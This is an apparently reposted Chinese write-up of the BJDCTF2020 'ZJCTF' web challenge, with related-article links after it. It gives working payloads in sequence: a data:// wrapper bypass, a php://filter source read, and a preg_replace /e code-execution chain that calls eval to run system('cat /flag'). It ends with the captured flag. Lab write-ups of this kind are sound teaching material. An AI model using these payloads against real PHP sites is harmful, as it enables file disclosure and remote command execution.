当前位置: 首页 > article >正文

[BJDCTF2020]ZJCTF,不过如此 1

[BJDCTF2020]ZJCTF,不过如此 1

打开实例发现代码审计

image-20241124093348482

需要GET传入text和file参数,然后执行文件包含

text需要读取到I have a dream文本,这边采用data流进行绕过

?text=data://,I have a dream&file=next.php

image-20241124101339063

成功绕过,接下来进行file文件包含

这边提示读取next.php,访问后无有效数据后,采用php为协议进行读取

?text=data://,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

image-20241124101514036

base64解码后获取到next.php源码

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}
foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}
function getFlag(){
	@eval($_GET['cmd']);
}

image-20241124101624741

再次代码审计

分析后注意到preg_replace()+/e,百度可知preg_replace()+/e存在代码执行漏洞,poc为:?\S*=${ 代码执行位置 }

尝试构建 phpinfo() poc

?\S*=${phpinfo()}

image-20241124104034770

成功显示phpinfo页面

因为上面base64解码后存在php的一个eval代码执行

function getFlag(){
	@eval($_GET['cmd']);
}

采用\S*调用getFlag()函数,然后get请求cmd参数执行任意命令

构建poc

?\S*=${getFlag()}&cmd=system("ls");

image-20241124104846126

未发现flag

ls一下根目录

?\S*=${getFlag()}&cmd=system("ls / -a");

image-20241124105041270

发现flag,读取他它

?\S*=${getFlag()}&cmd=system("cat /flag");

image-20241124105122967

成功获得flag

flag{804d2f52-b857-4cf2-ad25-fe95a67c9470}

http://www.kler.cn/a/443240.html

相关文章:

  • gbase8s之常用sql脚本
  • 浅谈单例模式
  • 【AI图像生成网站Golang】项目测试与优化
  • 电脑上怎么运行手机APP(电脑上运行手机APP的4种方法)
  • 深入解析java.lang.NumberFormatException异常及解决方法
  • Ubuntu交换区(Swap)扩容方法
  • linux 查找当前目录下大于10G的目录,并删除它们
  • mac电脑可以使用的模拟器
  • 网络术语MSS/MTU/TSO/Len说明
  • ABP vNext多租户配置及通过域名方式解析租户的实现
  • 构建一个rust生产应用读书笔记6-拒绝无效订阅者02
  • 深入探索Vue.js中的methods选项:事件处理与业务逻辑的核心机制
  • Android Compose Modifier
  • 简单了解一下 Go 语言的构建约束?
  • ES6中的map和set
  • PHP代码审计学习(一)--命令注入
  • Linux 常用命令功能解析:man、apropos、locate 和 which
  • OpenAI 与 ChatGPT 的关系解析
  • CSS系列(13)-- 预处理器详解
  • 2024告别培训班 数通、安全、云计算、云服务、存储、软考等1000G资源分享